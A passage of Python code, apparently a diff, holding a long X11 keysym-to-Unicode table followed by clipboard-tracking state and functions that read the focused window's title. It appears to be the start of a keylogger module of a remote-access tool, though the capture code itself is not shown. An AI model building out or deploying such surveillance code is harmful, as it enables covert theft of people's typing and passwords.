u'\\u0449', + 0x06de: u'\\u0447', 0x06df: u'\\u044a', 0x06e0: u'\\u042e', 0x06e1: u'\\u0410', 0x06e2: u'\\u0411', + 0x06e3: u'\\u0426', 0x06e4: u'\\u0414', 0x06e5: u'\\u0415', 0x06e6: u'\\u0424', 0x06e7: u'\\u0413', + 0x06e8: u'\\u0425', 0x06e9: u'\\u0418', 0x06ea: u'\\u0419', 0x06eb: u'\\u041a', 0x06ec: u'\\u041b', + 0x06ed: u'\\u041c', 0x06ee: u'\\u041d', 0x06ef: u'\\u041e', 0x06f0: u'\\u041f', 0x06f1: u'\\u042f', + 0x06f2: u'\\u0420', 0x06f3: u'\\u0421', 0x06f4: u'\\u0422', 0x06f5: u'\\u0423', 0x06f6: u'\\u0416', + 0x06f7: u'\\u0412', 0x06f8: u'\\u042c', 0x06f9: u'\\u042b', 0x06fa: u'\\u0417', 0x06fb: u'\\u0428', + 0x06fc: u'\\u042d', 0x06fd: u'\\u0429', 0x06fe: u'\\u0427', 0x06ff: u'\\u042a', 0x07a1: u'\\u0386', + 0x07a2: u'\\u0388', 0x07a3: u'\\u0389', 0x07a4: u'\\u038a', 0x07a5: u'\\u03aa', 0x07a7: u'\\u038c', + 0x07a8: u'\\u038e', 0x07a9: u'\\u03ab', 0x07ab: u'\\u038f', 0x07ae: u'\\u0385', 0x07af: u'\\u2015', + 0x07b1: u'\\u03ac', 0x07b2: u'\\u03ad', 0x07b3: u'\\u03ae', 0x07b4: u'\\u03af', 0x07b5: u'\\u03ca', + 0x07b6: u'\\u0390', 0x07b7: u'\\u03cc', 0x07b8: u'\\u03cd', 0x07b9: u'\\u03cb', 0x07ba: u'\\u03b0', + 0x07bb: u'\\u03ce', 0x07c1: u'\\u0391', 0x07c2: u'\\u0392', 0x07c3: u'\\u0393', 0x07c4: u'\\u0394', + 0x07c5: u'\\u0395', 0x07c6: u'\\u0396', 0x07c7: u'\\u0397', 0x07c8: u'\\u0398', 0x07c9: u'\\u0399', + 0x07ca: u'\\u039a', 0x07cb: u'\\u039b', 0x07cb: u'\\u039b', 0x07cc: u'\\u039c', 0x07cd: u'\\u039d', + 0x07ce: u'\\u039e', 0x07cf: u'\\u039f', 0x07d0: u'\\u03a0', 0x07d1: u'\\u03a1', 0x07d2: u'\\u03a3', + 0x07d4: u'\\u03a4', 0x07d5: u'\\u03a5', 0x07d6: u'\\u03a6', 0x07d7: u'\\u03a7', 0x07d8: u'\\u03a8', + 0x07d9: u'\\u03a9', 0x07e1: u'\\u03b1', 0x07e2: u'\\u03b2', 0x07e3: u'\\u03b3', 0x07e4: u'\\u03b4', + 0x07e5: u'\\u03b5', 0x07e6: u'\\u03b6', 0x07e7: u'\\u03b7', 0x07e8: u'\\u03b8', 0x07e9: u'\\u03b9', + 0x07ea: u'\\u03ba', 0x07eb: u'\\u03bb', 0x07ec: u'\\u03bc', 0x07ed: u'\\u03bd', 0x07ee: u'\\u03be', + 0x07ef: u'\\u03bf', 0x07f0: u'\\u03c0', 0x07f1: u'\\u03c1', 0x07f2: u'\\u03c3', 0x07f3: u'\\u03c2', + 0x07f4: u'\\u03c4', 0x07f5: u'\\u03c5', 0x07f6: u'\\u03c6', 0x07f7: u'\\u03c7', 0x07f8: u'\\u03c8', + 0x07f9: u'\\u03c9', 0x08a1: u'\\u23b7', 0x08a2: u'\\u250c', 0x08a3: u'\\u2500', 0x08a4: u'\\u2320', + 0x08a5: u'\\u2321', 0x08a6: u'\\u2502', 0x08a7: u'\\u23a1', 0x08a8: u'\\u23a3', 0x08a9: u'\\u23a4', + 0x08aa: u'\\u23a6', 0x08ab: u'\\u239b', 0x08ac: u'\\u239d', 0x08ad: u'\\u239e', 0x08ae: u'\\u23a0', + 0x08af: u'\\u23a8', 0x08b0: u'\\u23ac', 0x08bc: u'\\u2264', 0x08bd: u'\\u2260', 0x08be: u'\\u2265', + 0x08bf: u'\\u222b', 0x08c0: u'\\u2234', 0x08c1: u'\\u221d', 0x08c2: u'\\u221e', 0x08c5: u'\\u2207', + 0x08c8: u'\\u223c', 0x08c9: u'\\u2243', 0x08cd: u'\\u21d4', 0x08ce: u'\\u21d2', 0x08cf: u'\\u2261', + 0x08d6: u'\\u221a', 0x08da: u'\\u2282', 0x08db: u'\\u2283', 0x08dc: u'\\u2229', 0x08dd: u'\\u222a', + 0x08de: u'\\u2227', 0x08df: u'\\u2228', 0x08ef: u'\\u2202', 0x08f6: u'\\u0192', 0x08fb: u'\\u2190', + 0x08fc: u'\\u2191', 0x08fd: u'\\u2192', 0x08fe: u'\\u2193', 0x09e0: u'\\u25c6', 0x09e1: u'\\u2592', + 0x09e2: u'\\u2409', 0x09e3: u'\\u240c', 0x09e4: u'\\u240d', 0x09e5: u'\\u240a', 0x09e8: u'\\u2424', + 0x09e9: u'\\u240b', 0x09ea: u'\\u2518', 0x09eb: u'\\u2510', 0x09ec: u'\\u250c', 0x09ed: u'\\u2514', + 0x09ee: u'\\u253c', 0x09ef: u'\\u23ba', 0x09f0: u'\\u23bb', 0x09f1: u'\\u2500', 0x09f2: u'\\u23bc', + 0x09f3: u'\\u23bd', 0x09f4: u'\\u251c', 0x09f5: u'\\u2524', 0x09f6: u'\\u2534', 0x09f7: u'\\u252c', + 0x09f8: u'\\u2502', 0x0aa1: u'\\u2003', 0x0aa2: u'\\u2002', 0x0aa3: u'\\u2004', 0x0aa4: u'\\u2005', + 0x0aa5: u'\\u2007', 0x0aa6: u'\\u2008', 0x0aa7: u'\\u2009', 0x0aa8: u'\\u200a', 0x0aa9: u'\\u2014', + 0x0aaa: u'\\u2013', 0x0aac: u'\\u2423', 0x0aae: u'\\u2026', 0x0aaf: u'\\u2025', 0x0ab0: u'\\u2153', + 0x0ab1: u'\\u2154', 0x0ab2: u'\\u2155', 0x0ab3: u'\\u2156', 0x0ab4: u'\\u2157', 0x0ab5: u'\\u2158', + 0x0ab6: u'\\u2159', 0x0ab7: u'\\u215a', 0x0ab8: u'\\u2105', 0x0abb: u'\\u2012', 0x0abc: u'\\u27e8', + 0x0abd: u'\\u002e', 0x0abe: u'\\u27e9', 0x0ac3: u'\\u215b', 0x0ac4: u'\\u215c', 0x0ac5: u'\\u215d', + 0x0ac6: u'\\u215e', 0x0ac9: u'\\u2122', 0x0aca: u'\\u2613', 0x0acc: u'\\u25c1', 0x0acd: u'\\u25b7', + 0x0ace: u'\\u25cb', 0x0acf: u'\\u25af', 0x0ad0: u'\\u2018', 0x0ad1: u'\\u2019', 0x0ad2: u'\\u201c', + 0x0ad3: u'\\u201d', 0x0ad4: u'\\u211e', 0x0ad6: u'\\u2032', 0x0ad7: u'\\u2033', 0x0ad9: u'\\u271d', + 0x0adb: u'\\u25ac', 0x0adc: u'\\u25c0', 0x0add: u'\\u25b6', 0x0ade: u'\\u25cf', 0x0adf: u'\\u25ae', + 0x0ae0: u'\\u25e6', 0x0ae1: u'\\u25ab', 0x0ae2: u'\\u25ad', 0x0ae3: u'\\u25b3', 0x0ae4: u'\\u25bd', + 0x0ae5: u'\\u2606', 0x0ae6: u'\\u2022', 0x0ae7: u'\\u25aa', 0x0ae8: u'\\u25b2', 0x0ae9: u'\\u25bc', + 0x0aea: u'\\u261c', 0x0aeb: u'\\u261e', 0x0aec: u'\\u2663', 0x0aed: u'\\u2666', 0x0aee: u'\\u2665', + 0x0af0: u'\\u2720', 0x0af1: u'\\u2020', 0x0af2: u'\\u2021', 0x0af3: u'\\u2713', 0x0af4: u'\\u2717', + 0x0af5: u'\\u266f', 0x0af6: u'\\u266d', 0x0af7: u'\\u2642', 0x0af8: u'\\u2640', 0x0af9: u'\\u260e', + 0x0afa: u'\\u2315', 0x0afb: u'\\u2117', 0x0afc: u'\\u2038', 0x0afd: u'\\u201a', 0x0afe: u'\\u201e', + 0x0ba3: u'\\u003c', 0x0ba6: u'\\u003e', 0x0ba8: u'\\u2228', 0x0ba9: u'\\u2227', 0x0bc0: u'\\u00af', + 0x0bc2: u'\\u22a5', 0x0bc3: u'\\u2229', 0x0bc4: u'\\u230a', 0x0bc6: u'\\u005f', 0x0bca: u'\\u2218', + 0x0bcc: u'\\u2395', 0x0bce: u'\\u22a4', 0x0bcf: u'\\u25cb', 0x0bd3: u'\\u2308', 0x0bd6: u'\\u222a', + 0x0bd8: u'\\u2283', 0x0bda: u'\\u2282', 0x0bdc: u'\\u22a2', 0x0bfc: u'\\u22a3', 0x0cdf: u'\\u2017', + 0x0ce0: u'\\u05d0', 0x0ce1: u'\\u05d1', 0x0ce1: u'\\u05d1', 0x0ce2: u'\\u05d2', 0x0ce2: u'\\u05d2', + 0x0ce3: u'\\u05d3', 0x0ce3: u'\\u05d3', 0x0ce4: u'\\u05d4', 0x0ce5: u'\\u05d5', 0x0ce6: u'\\u05d6', + 0x0ce6: u'\\u05d6', 0x0ce7: u'\\u05d7', 0x0ce7: u'\\u05d7', 0x0ce8: u'\\u05d8', 0x0ce8: u'\\u05d8', + 0x0ce9: u'\\u05d9', 0x0cea: u'\\u05da', 0x0ceb: u'\\u05db', 0x0cec: u'\\u05dc', 0x0ced: u'\\u05dd', + 0x0cee: u'\\u05de', 0x0cef: u'\\u05df', 0x0cf0: u'\\u05e0', 0x0cf1: u'\\u05e1', 0x0cf1: u'\\u05e1', + 0x0cf2: u'\\u05e2', 0x0cf3: u'\\u05e3', 0x0cf4: u'\\u05e4', 0x0cf5: u'\\u05e5', 0x0cf5: u'\\u05e5', + 0x0cf6: u'\\u05e6', 0x0cf6: u'\\u05e6', 0x0cf7: u'\\u05e7', 0x0cf7: u'\\u05e7', 0x0cf8: u'\\u05e8', + 0x0cf9: u'\\u05e9', 0x0cfa: u'\\u05ea', 0x0cfa: u'\\u05ea', 0x0da1: u'\\u0e01', 0x0da2: u'\\u0e02', + 0x0da3: u'\\u0e03', 0x0da4: u'\\u0e04', 0x0da5: u'\\u0e05', 0x0da6: u'\\u0e06', 0x0da7: u'\\u0e07', + 0x0da8: u'\\u0e08', 0x0da9: u'\\u0e09', 0x0daa: u'\\u0e0a', 0x0dab: u'\\u0e0b', 0x0dac: u'\\u0e0c', + 0x0dad: u'\\u0e0d', 0x0dae: u'\\u0e0e', 0x0daf: u'\\u0e0f', 0x0db0: u'\\u0e10', 0x0db1: u'\\u0e11', + 0x0db2: u'\\u0e12', 0x0db3: u'\\u0e13', 0x0db4: u'\\u0e14', 0x0db5: u'\\u0e15', 0x0db6: u'\\u0e16', + 0x0db7: u'\\u0e17', 0x0db8: u'\\u0e18', 0x0db9: u'\\u0e19', 0x0dba: u'\\u0e1a', 0x0dbb: u'\\u0e1b', + 0x0dbc: u'\\u0e1c', 0x0dbd: u'\\u0e1d', 0x0dbe: u'\\u0e1e', 0x0dbf: u'\\u0e1f', 0x0dc0: u'\\u0e20', + 0x0dc1: u'\\u0e21', 0x0dc2: u'\\u0e22', 0x0dc3: u'\\u0e23', 0x0dc4: u'\\u0e24', 0x0dc5: u'\\u0e25', + 0x0dc6: u'\\u0e26', 0x0dc7: u'\\u0e27', 0x0dc8: u'\\u0e28', 0x0dc9: u'\\u0e29', 0x0dca: u'\\u0e2a', + 0x0dcb: u'\\u0e2b', 0x0dcc: u'\\u0e2c', 0x0dcd: u'\\u0e2d', 0x0dce: u'\\u0e2e', 0x0dcf: u'\\u0e2f', + 0x0dd0: u'\\u0e30', 0x0dd1: u'\\u0e31', 0x0dd2: u'\\u0e32', 0x0dd3: u'\\u0e33', 0x0dd4: u'\\u0e34', + 0x0dd5: u'\\u0e35', 0x0dd6: u'\\u0e36', 0x0dd7: u'\\u0e37', 0x0dd8: u'\\u0e38', 0x0dd9: u'\\u0e39', + 0x0dda: u'\\u0e3a', 0x0ddf: u'\\u0e3f', 0x0de0: u'\\u0e40', 0x0de1: u'\\u0e41', 0x0de2: u'\\u0e42', + 0x0de3: u'\\u0e43', 0x0de4: u'\\u0e44', 0x0de5: u'\\u0e45', 0x0de6: u'\\u0e46', 0x0de7: u'\\u0e47', + 0x0de8: u'\\u0e48', 0x0de9: u'\\u0e49', 0x0dea: u'\\u0e4a', 0x0deb: u'\\u0e4b', 0x0dec: u'\\u0e4c', + 0x0ded: u'\\u0e4d', 0x0df0: u'\\u0e50', 0x0df1: u'\\u0e51', 0x0df2: u'\\u0e52', 0x0df3: u'\\u0e53', + 0x0df4: u'\\u0e54', 0x0df5: u'\\u0e55', 0x0df6: u'\\u0e56', 0x0df7: u'\\u0e57', 0x0df8: u'\\u0e58', + 0x0df9: u'\\u0e59', 0x0ea1: u'\\u3131', 0x0ea2: u'\\u3132', 0x0ea3: u'\\u3133', 0x0ea4: u'\\u3134', + 0x0ea5: u'\\u3135', 0x0ea6: u'\\u3136', 0x0ea7: u'\\u3137', 0x0ea8: u'\\u3138', 0x0ea9: u'\\u3139', + 0x0eaa: u'\\u313a', 0x0eab: u'\\u313b', 0x0eac: u'\\u313c', 0x0ead: u'\\u313d', 0x0eae: u'\\u313e', + 0x0eaf: u'\\u313f', 0x0eb0: u'\\u3140', 0x0eb1: u'\\u3141', 0x0eb2: u'\\u3142', 0x0eb3: u'\\u3143', + 0x0eb4: u'\\u3144', 0x0eb5: u'\\u3145', 0x0eb6: u'\\u3146', 0x0eb7: u'\\u3147', 0x0eb8: u'\\u3148', + 0x0eb9: u'\\u3149', 0x0eba: u'\\u314a', 0x0ebb: u'\\u314b', 0x0ebc: u'\\u314c', 0x0ebd: u'\\u314d', + 0x0ebe: u'\\u314e', 0x0ebf: u'\\u314f', 0x0ec0: u'\\u3150', 0x0ec1: u'\\u3151', 0x0ec2: u'\\u3152', + 0x0ec3: u'\\u3153', 0x0ec4: u'\\u3154', 0x0ec5: u'\\u3155', 0x0ec6: u'\\u3156', 0x0ec7: u'\\u3157', + 0x0ec8: u'\\u3158', 0x0ec9: u'\\u3159', 0x0eca: u'\\u315a', 0x0ecb: u'\\u315b', 0x0ecc: u'\\u315c', + 0x0ecd: u'\\u315d', 0x0ece: u'\\u315e', 0x0ecf: u'\\u315f', 0x0ed0: u'\\u3160', 0x0ed1: u'\\u3161', + 0x0ed2: u'\\u3162', 0x0ed3: u'\\u3163', 0x0ed4: u'\\u11a8', 0x0ed5: u'\\u11a9', 0x0ed6: u'\\u11aa', + 0x0ed7: u'\\u11ab', 0x0ed8: u'\\u11ac', 0x0ed9: u'\\u11ad', 0x0eda: u'\\u11ae', 0x0edb: u'\\u11af', + 0x0edc: u'\\u11b0', 0x0edd: u'\\u11b1', 0x0ede: u'\\u11b2', 0x0edf: u'\\u11b3', 0x0ee0: u'\\u11b4', + 0x0ee1: u'\\u11b5', 0x0ee2: u'\\u11b6', 0x0ee3: u'\\u11b7', 0x0ee4: u'\\u11b8', 0x0ee5: u'\\u11b9', + 0x0ee6: u'\\u11ba', 0x0ee7: u'\\u11bb', 0x0ee8: u'\\u11bc', 0x0ee9: u'\\u11bd', 0x0eea: u'\\u11be', + 0x0eeb: u'\\u11bf', 0x0eec: u'\\u11c0', 0x0eed: u'\\u11c1', 0x0eee: u'\\u11c2', 0x0eef: u'\\u316d', + 0x0ef0: u'\\u3171', 0x0ef1: u'\\u3178', 0x0ef2: u'\\u317f', 0x0ef3: u'\\u3181', 0x0ef4: u'\\u3184', + 0x0ef5: u'\\u3186', 0x0ef6: u'\\u318d', 0x0ef7: u'\\u318e', 0x0ef8: u'\\u11eb', 0x0ef9: u'\\u11f0', + 0x0efa: u'\\u11f9', 0x0eff: u'\\u20a9', 0x13bc: u'\\u0152', 0x13bd: u'\\u0153', 0x13be: u'\\u0178', + 0x20a0: u'\\u20a0', 0x20a1: u'\\u20a1', 0x20a2: u'\\u20a2', 0x20a3: u'\\u20a3', 0x20a4: u'\\u20a4', + 0x20a5: u'\\u20a5', 0x20a6: u'\\u20a6', 0x20a7: u'\\u20a7', 0x20a8: u'\\u20a8', 0x20a9: u'\\u20a9', + 0x20aa: u'\\u20aa', 0x20ab: u'\\u20ab', 0x20ac: u'\\u20ac', 0xfe50: u'\\u0300', 0xfe51: u'\\u0301', + 0xfe52: u'\\u0302', 0xfe53: u'\\u0303', 0xfe54: u'\\u0304', 0xfe55: u'\\u0306', 0xfe56: u'\\u0307', + 0xfe57: u'\\u0308', 0xfe58: u'\\u030a', 0xfe59: u'\\u030b', 0xfe5a: u'\\u030c', 0xfe5b: u'\\u0327', + 0xfe5c: u'\\u0328', 0xfe5d: u'\\u0345', 0xfe5e: u'\\u3099', 0xfe5f: u'\\u309a', 0xff08: u'\\u0008', + 0xff09: u'\\u0009', 0xff0a: u'\\u000a', 0xff0b: u'\\u000b', 0xff0d: u'\\u000d', 0xff13: u'\\u0013', + 0xff14: u'\\u0014', 0xff15: u'\\u0015', 0xff1b: u'\\u001b', 0xff80: u'\\u0020', 0xff89: u'\\u0009', + 0xff8d: u'\\u000d', 0xffaa: u'\\u002a', 0xffab: u'\\u002b', 0xffac: u'\\u002c', 0xffad: u'\\u002d', + 0xffae: u'\\u002e', 0xffaf: u'\\u002f', 0xffb0: u'\\u0030', 0xffb1: u'\\u0031', 0xffb2: u'\\u0032', + 0xffb3: u'\\u0033', 0xffb4: u'\\u0034', 0xffb5: u'\\u0035', 0xffb6: u'\\u0036', 0xffb7: u'\\u0037', + 0xffb8: u'\\u0038', 0xffb9: u'\\u0039', 0xffbd: u'\\u003d', 0x06ad: u'\\u0491', 0x06bd: u'\\u0490', + 0x14a2: u'\\u0587', 0x14a3: u'\\u0589', 0x14a4: u'\\u0029', 0x14a5: u'\\u0028', 0x14a6: u'\\u00bb', + 0x14a7: u'\\u00ab', 0x14a8: u'\\u2014', 0x14a9: u'\\u002e', 0x14aa: u'\\u055d', 0x14ab: u'\\u002c', + 0x14ac: u'\\u2013', 0x14ad: u'\\u058a', 0x14ae: u'\\u2026', 0x14af: u'\\u055c', 0x14b0: u'\\u055b', + 0x14b1: u'\\u055e', 0x14b2: u'\\u0531', 0x14b3: u'\\u0561', 0x14b4: u'\\u0532', 0x14b5: u'\\u0562', + 0x14b6: u'\\u0533', 0x14b7: u'\\u0563', 0x14b8: u'\\u0534', 0x14b9: u'\\u0564', 0x14ba: u'\\u0535', + 0x14bb: u'\\u0565', 0x14bc: u'\\u0536', 0x14bd: u'\\u0566', 0x14be: u'\\u0537', 0x14bf: u'\\u0567', + 0x14c0: u'\\u0538', 0x14c1: u'\\u0568', 0x14c2: u'\\u0539', 0x14c3: u'\\u0569', 0x14c4: u'\\u053a', + 0x14c5: u'\\u056a', 0x14c6: u'\\u053b', 0x14c7: u'\\u056b', 0x14c8: u'\\u053c', 0x14c9: u'\\u056c', + 0x14ca: u'\\u053d', 0x14cb: u'\\u056d', 0x14cc: u'\\u053e', 0x14cd: u'\\u056e', 0x14ce: u'\\u053f', + 0x14cf: u'\\u056f', 0x14d0: u'\\u0540', 0x14d1: u'\\u0570', 0x14d2: u'\\u0541', 0x14d3: u'\\u0571', + 0x14d4: u'\\u0542', 0x14d5: u'\\u0572', 0x14d6: u'\\u0543', 0x14d7: u'\\u0573', 0x14d8: u'\\u0544', + 0x14d9: u'\\u0574', 0x14da: u'\\u0545', 0x14db: u'\\u0575', 0x14dc: u'\\u0546', 0x14dd: u'\\u0576', + 0x14de: u'\\u0547', 0x14df: u'\\u0577', 0x14e0: u'\\u0548', 0x14e1: u'\\u0578', 0x14e2: u'\\u0549', + 0x14e3: u'\\u0579', 0x14e4: u'\\u054a', 0x14e5: u'\\u057a', 0x14e6: u'\\u054b', 0x14e7: u'\\u057b', + 0x14e8: u'\\u054c', 0x14e9: u'\\u057c', 0x14ea: u'\\u054d', 0x14eb: u'\\u057d', 0x14ec: u'\\u054e', + 0x14ed: u'\\u057e', 0x14ee: u'\\u054f', 0x14ef: u'\\u057f', 0x14f0: u'\\u0550', 0x14f1: u'\\u0580', + 0x14f2: u'\\u0551', 0x14f3: u'\\u0581', 0x14f4: u'\\u0552', 0x14f5: u'\\u0582', 0x14f6: u'\\u0553', + 0x14f7: u'\\u0583', 0x14f8: u'\\u0554', 0x14f9: u'\\u0584', 0x14fa: u'\\u0555', 0x14fb: u'\\u0585', + 0x14fc: u'\\u0556', 0x14fd: u'\\u0586', 0x14fe: u'\\u055a', 0x14ff: u'\\u00a7', 0x15d0: u'\\u10d0', + 0x15d1: u'\\u10d1', 0x15d2: u'\\u10d2', 0x15d3: u'\\u10d3', 0x15d4: u'\\u10d4', 0x15d5: u'\\u10d5', + 0x15d6: u'\\u10d6', 0x15d7: u'\\u10d7', 0x15d8: u'\\u10d8', 0x15d9: u'\\u10d9', 0x15da: u'\\u10da', + 0x15db: u'\\u10db', 0x15dc: u'\\u10dc', 0x15dd: u'\\u10dd', 0x15de: u'\\u10de', 0x15df: u'\\u10df', + 0x15e0: u'\\u10e0', 0x15e1: u'\\u10e1', 0x15e2: u'\\u10e2', 0x15e3: u'\\u10e3', 0x15e4: u'\\u10e4', + 0x15e5: u'\\u10e5', 0x15e6: u'\\u10e6', 0x15e7: u'\\u10e7', 0x15e8: u'\\u10e8', 0x15e9: u'\\u10e9', + 0x15ea: u'\\u10ea', 0x15eb: u'\\u10eb', 0x15ec: u'\\u10ec', 0x15ed: u'\\u10ed', 0x15ee: u'\\u10ee', + 0x15ef: u'\\u10ef', 0x15f0: u'\\u10f0', 0x15f1: u'\\u10f1', 0x15f2: u'\\u10f2', 0x15f3: u'\\u10f3', + 0x15f4: u'\\u10f4', 0x15f5: u'\\u10f5', 0x15f6: u'\\u10f6', 0x12a1: u'\\u1e02', 0x12a2: u'\\u1e03', + 0x12a6: u'\\u1e0a', 0x12a8: u'\\u1e80', 0x12aa: u'\\u1e82', 0x12ab: u'\\u1e0b', 0x12ac: u'\\u1ef2', + 0x12b0: u'\\u1e1e', 0x12b1: u'\\u1e1f', 0x12b4: u'\\u1e40', 0x12b5: u'\\u1e41', 0x12b7: u'\\u1e56', + 0x12b8: u'\\u1e81', 0x12b9: u'\\u1e57', 0x12ba: u'\\u1e83', 0x12bb: u'\\u1e60', 0x12bc: u'\\u1ef3', + 0x12bd: u'\\u1e84', 0x12be: u'\\u1e85', 0x12bf: u'\\u1e61', 0x12d0: u'\\u0174', 0x12d7: u'\\u1e6a', + 0x12de: u'\\u0176', 0x12f0: u'\\u0175', 0x12f7: u'\\u1e6b', 0x12fe: u'\\u0177', 0x0590: u'\\u06f0', + 0x0591: u'\\u06f1', 0x0592: u'\\u06f2', 0x0593: u'\\u06f3', 0x0594: u'\\u06f4', 0x0595: u'\\u06f5', + 0x0596: u'\\u06f6', 0x0597: u'\\u06f7', 0x0598: u'\\u06f8', 0x0599: u'\\u06f9', 0x05a5: u'\\u066a', + 0x05a6: u'\\u0670', 0x05a7: u'\\u0679', 0x05a8: u'\\u067e', 0x05a9: u'\\u0686', 0x05aa: u'\\u0688', + 0x05ab: u'\\u0691', 0x05ae: u'\\u06d4', 0x05b0: u'\\u0660', 0x05b1: u'\\u0661', 0x05b2: u'\\u0662', + 0x05b3: u'\\u0663', 0x05b4: u'\\u0664', 0x05b5: u'\\u0665', 0x05b6: u'\\u0666', 0x05b7: u'\\u0667', + 0x05b8: u'\\u0668', 0x05b9: u'\\u0669', 0x05f3: u'\\u0653', 0x05f4: u'\\u0654', 0x05f5: u'\\u0655', + 0x05f6: u'\\u0698', 0x05f7: u'\\u06a4', 0x05f8: u'\\u06a9', 0x05f9: u'\\u06af', 0x05fa: u'\\u06ba', + 0x05fb: u'\\u06be', 0x05fc: u'\\u06cc', 0x05fd: u'\\u06d2', 0x05fe: u'\\u06c1', 0x0680: u'\\u0492', + 0x0681: u'\\u0496', 0x0682: u'\\u049a', 0x0683: u'\\u049c', 0x0684: u'\\u04a2', 0x0685: u'\\u04ae', + 0x0686: u'\\u04b0', 0x0687: u'\\u04b2', 0x0688: u'\\u04b6', 0x0689: u'\\u04b8', 0x068a: u'\\u04ba', + 0x068c: u'\\u04d8', 0x068d: u'\\u04e2', 0x068e: u'\\u04e8', 0x068f: u'\\u04ee', 0x0690: u'\\u0493', + 0x0691: u'\\u0497', 0x0692: u'\\u049b', 0x0693: u'\\u049d', 0x0694: u'\\u04a3', 0x0695: u'\\u04af', + 0x0696: u'\\u04b1', 0x0697: u'\\u04b3', 0x0698: u'\\u04b7', 0x0699: u'\\u04b9', 0x069a: u'\\u04bb', + 0x069c: u'\\u04d9', 0x069d: u'\\u04e3', 0x069e: u'\\u04e9', 0x069f: u'\\u04ef', 0x16a3: u'\\u1e8a', + 0x16a6: u'\\u012c', 0x16a9: u'\\u01b5', 0x16aa: u'\\u01e6', 0x16af: u'\\u019f', 0x16b3: u'\\u1e8b', + 0x16b6: u'\\u012d', 0x16b9: u'\\u01b6', 0x16ba: u'\\u01e7', 0x16bd: u'\\u01d2', 0x16bf: u'\\u0275', + 0x16c6: u'\\u018f', 0x16f6: u'\\u0259', 0x16d1: u'\\u1e36', 0x16e1: u'\\u1e37', 0x1ea0: u'\\u1ea0', + 0x1ea1: u'\\u1ea1', 0x1ea2: u'\\u1ea2', 0x1ea3: u'\\u1ea3', 0x1ea4: u'\\u1ea4', 0x1ea5: u'\\u1ea5', + 0x1ea6: u'\\u1ea6', 0x1ea7: u'\\u1ea7', 0x1ea8: u'\\u1ea8', 0x1ea9: u'\\u1ea9', 0x1eaa: u'\\u1eaa', + 0x1eab: u'\\u1eab', 0x1eac: u'\\u1eac', 0x1ead: u'\\u1ead', 0x1eae: u'\\u1eae', 0x1eaf: u'\\u1eaf', + 0x1eb0: u'\\u1eb0', 0x1eb1: u'\\u1eb1', 0x1eb2: u'\\u1eb2', 0x1eb3: u'\\u1eb3', 0x1eb4: u'\\u1eb4', + 0x1eb5: u'\\u1eb5', 0x1eb6: u'\\u1eb6', 0x1eb7: u'\\u1eb7', 0x1eb8: u'\\u1eb8', 0x1eb9: u'\\u1eb9', + 0x1eba: u'\\u1eba', 0x1ebb: u'\\u1ebb', 0x1ebc: u'\\u1ebc', 0x1ebd: u'\\u1ebd', 0x1ebe: u'\\u1ebe', + 0x1ebf: u'\\u1ebf', 0x1ec0: u'\\u1ec0', 0x1ec1: u'\\u1ec1', 0x1ec2: u'\\u1ec2', 0x1ec3: u'\\u1ec3', + 0x1ec4: u'\\u1ec4', 0x1ec5: u'\\u1ec5', 0x1ec6: u'\\u1ec6', 0x1ec7: u'\\u1ec7', 0x1ec8: u'\\u1ec8', + 0x1ec9: u'\\u1ec9', 0x1eca: u'\\u1eca', 0x1ecb: u'\\u1ecb', 0x1ecc: u'\\u1ecc', 0x1ecd: u'\\u1ecd', + 0x1ece: u'\\u1ece', 0x1ecf: u'\\u1ecf', 0x1ed0: u'\\u1ed0', 0x1ed1: u'\\u1ed1', 0x1ed2: u'\\u1ed2', + 0x1ed3: u'\\u1ed3', 0x1ed4: u'\\u1ed4', 0x1ed5: u'\\u1ed5', 0x1ed6: u'\\u1ed6', 0x1ed7: u'\\u1ed7', + 0x1ed8: u'\\u1ed8', 0x1ed9: u'\\u1ed9', 0x1eda: u'\\u1eda', 0x1edb: u'\\u1edb', 0x1edc: u'\\u1edc', + 0x1edd: u'\\u1edd', 0x1ede: u'\\u1ede', 0x1edf: u'\\u1edf', 0x1ee0: u'\\u1ee0', 0x1ee1: u'\\u1ee1', + 0x1ee2: u'\\u1ee2', 0x1ee3: u'\\u1ee3', 0x1ee4: u'\\u1ee4', 0x1ee5: u'\\u1ee5', 0x1ee6: u'\\u1ee6', + 0x1ee7: u'\\u1ee7', 0x1ee8: u'\\u1ee8', 0x1ee9: u'\\u1ee9', 0x1eea: u'\\u1eea', 0x1eeb: u'\\u1eeb', + 0x1eec: u'\\u1eec', 0x1eed: u'\\u1eed', 0x1eee: u'\\u1eee', 0x1eef: u'\\u1eef', 0x1ef0: u'\\u1ef0', + 0x1ef1: u'\\u1ef1', 0x1ef4: u'\\u1ef4', 0x1ef5: u'\\u1ef5', 0x1ef6: u'\\u1ef6', 0x1ef7: u'\\u1ef7', + 0x1ef8: u'\\u1ef8', 0x1ef9: u'\\u1ef9', 0x1efa: u'\\u01a0', 0x1efb: u'\\u01a1', 0x1efc: u'\\u01af', + 0x1efd: u'\\u01b0', 0x1e9f: u'\\u0303', 0x1ef2: u'\\u0300', 0x1ef3: u'\\u0301', 0x1efe: u'\\u0309', + 0x1eff: u'\\u0323', 0xfe60: u'\\u0323', 0xfe61: u'\\u0309', 0xfe62: u'\\u031b', + }.get(ks) + +class NotAvailable(Exception): + pass + +job_message_buffer(str(x11)+' '+str(xi)+'\\n') + +daemon = False +stopped = False +last_clipboard = "" +state = set() +group = 0 +level = 0 +display = None +x11 = x11 +xi = xi + +XkbEventCode = ct.c_int(0) +XkbErrorReturn = ct.c_int(0) +XkbMajorVersion = ct.c_int(1) +XkbMinorVersion = ct.c_int(0) +XkbReasonReturn = ct.c_int(0) + +if x11: + display = x11.XkbOpenDisplay( + None, + ct.pointer(XkbEventCode), ct.pointer(XkbErrorReturn), + ct.pointer(XkbMajorVersion), ct.pointer(XkbMinorVersion), + ct.pointer(XkbReasonReturn) + ) + +def get_active_window(): + window = ct.c_ulong() + dw = ct.c_int() + + if not ( x11.XGetInputFocus( + display, ct.pointer(window), ct.pointer(dw) + ) and window ): + return + + return window + +def get_window_title(window): + if not window: + return + + hint = ClassHint() + if x11.XGetClassHint(display, window, ct.pointer(hint)): + return hint.name + +def get_window_name(window): + prop = XTextProperty() + x11.XGetWMName(display, window, ct.pointer(prop)) + state = ct.c_char_p("WM_STATE") + onlyifexist = ct.c_bool(False) + atom = x11.XInternAtom(display, state, False) + refs = (ct.byref(ct.c_ulong()), ct.byref(ct.c_int()), ct.byref(ct.c_ulong())) + buf_len = ct.c_ulong() + buf = ct.c_char_p() + x11.XGetWindowProperty(display, window, atom, 0, 0, False, + 0, refs[0], refs[1], refs[2], + ct.byref(buf_len), ct.byref(buf)) + if 